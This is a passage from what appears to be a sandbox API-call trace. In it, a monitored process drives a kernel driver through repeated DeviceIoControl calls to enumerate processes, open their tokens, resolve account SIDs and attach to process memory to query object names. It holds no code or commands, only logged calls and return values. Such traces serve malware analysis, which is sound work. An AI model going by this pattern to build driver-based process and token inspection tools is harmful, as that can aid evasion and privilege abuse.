lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.382] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.383] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.383] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x710) returned 0x0 [0227.383] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.383] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.383] PsLookupProcessByProcessId (in: ProcessId=0x710, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.383] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.383] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.383] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.383] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.383] PsLookupProcessByProcessId (in: ProcessId=0x710, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.383] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.383] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.383] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.383] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.383] PsLookupProcessByProcessId (in: ProcessId=0x710, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.383] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.384] PsLookupProcessByProcessId (in: ProcessId=0x710, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.384] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb1c) returned 0x0 [0227.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.384] PsLookupProcessByProcessId (in: ProcessId=0xb1c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.384] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.384] PsLookupProcessByProcessId (in: ProcessId=0xb1c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.384] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.384] PsLookupProcessByProcessId (in: ProcessId=0xb1c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.384] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.384] PsLookupProcessByProcessId (in: ProcessId=0xb1c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.384] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.385] PsLookupProcessByProcessId (in: ProcessId=0xb1c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.385] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.385] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.385] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.385] PsLookupProcessByProcessId (in: ProcessId=0xb1c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.385] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.385] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.385] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.385] PsLookupProcessByProcessId (in: ProcessId=0xb1c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.385] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.385] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xafc) returned 0x0 [0227.385] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.385] PsLookupProcessByProcessId (in: ProcessId=0xafc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.385] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.385] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.385] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.385] PsLookupProcessByProcessId (in: ProcessId=0xafc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.385] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.385] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.385] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.385] PsLookupProcessByProcessId (in: ProcessId=0xafc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.385] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.386] PsLookupProcessByProcessId (in: ProcessId=0xafc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.386] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.386] PsLookupProcessByProcessId (in: ProcessId=0xafc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.386] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.386] PsLookupProcessByProcessId (in: ProcessId=0xafc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.386] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0227.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.386] PsLookupProcessByProcessId (in: ProcessId=0xa18, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.386] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.386] PsLookupProcessByProcessId (in: ProcessId=0xa18, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.386] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xad8) returned 0x0 [0227.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.387] PsLookupProcessByProcessId (in: ProcessId=0xad8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.387] PsLookupProcessByProcessId (in: ProcessId=0xad8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.387] PsLookupProcessByProcessId (in: ProcessId=0xad8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.387] PsLookupProcessByProcessId (in: ProcessId=0xad8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.387] PsLookupProcessByProcessId (in: ProcessId=0xad8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.388] PsLookupProcessByProcessId (in: ProcessId=0xad8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.388] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.388] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.388] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.388] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.388] PsLookupProcessByProcessId (in: ProcessId=0xad8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.388] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.388] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b8) returned 0xc8 [0227.388] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.388] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80030cd310, HandleInformation=0x0) returned 0x0 [0227.388] ObOpenObjectByPointer (in: Object=0xfffffa80030cd310, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff8000083c) returned 0x0 [0227.388] ObfDereferenceObject (Object=0xfffffa80030cd310) returned 0x14 [0227.388] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000083c, DesiredAccess=0x8, TokenHandle=0xfffffa8001f762c0 | out: TokenHandle=0xfffffa8001f762c0*=0xc4) returned 0x0 [0227.388] ZwClose (Handle=0xffffffff8000083c) returned 0x0 [0227.388] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.388] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.388] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.390] CloseHandle (hObject=0xc4) returned 1 [0227.390] CloseHandle (hObject=0xc8) returned 1 [0227.390] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.390] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0227.390] PsLookupProcessByProcessId (in: ProcessId=0x6b8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.391] PsAcquireProcessExitSynchronization () returned 0x0 [0227.391] KeStackAttachProcess (in: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880052b35d0) [0227.391] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800240bdd0, HandleInformation=0x0) returned 0x0 [0227.391] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.391] PsReleaseProcessExitSynchronization () returned 0x2 [0227.391] ObfDereferenceObject (Object=0xfffffa80030cd310) returned 0x12 [0227.391] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.391] ObfDereferenceObject (Object=0xfffffa800240bdd0) returned 0x1 [0227.391] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.391] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.391] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.391] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.391] PsLookupProcessByProcessId (in: ProcessId=0x6b8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.391] PsAcquireProcessExitSynchronization () returned 0x0 [0227.391] KeStackAttachProcess (in: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880052b35d0) [0227.391] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800290f070, HandleInformation=0x0) returned 0x0 [0227.391] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.391] PsReleaseProcessExitSynchronization () returned 0x2 [0227.391] ObfDereferenceObject (Object=0xfffffa80030cd310) returned 0x12 [0227.391] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.391] ObfDereferenceObject (Object=0xfffffa800290f070) returned 0x1 [0227.391] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.391] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x69c) returned 0xc8 [0227.391] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.392] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80030df060, HandleInformation=0x0) returned 0x0 [0227.392] ObOpenObjectByPointer (in: Object=0xfffffa80030df060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff8000083c) returned 0x0 [0227.392] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x26 [0227.392] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000083c, DesiredAccess=0x8, TokenHandle=0xfffffa8001f762c0 | out: TokenHandle=0xfffffa8001f762c0*=0xc4) returned 0x0 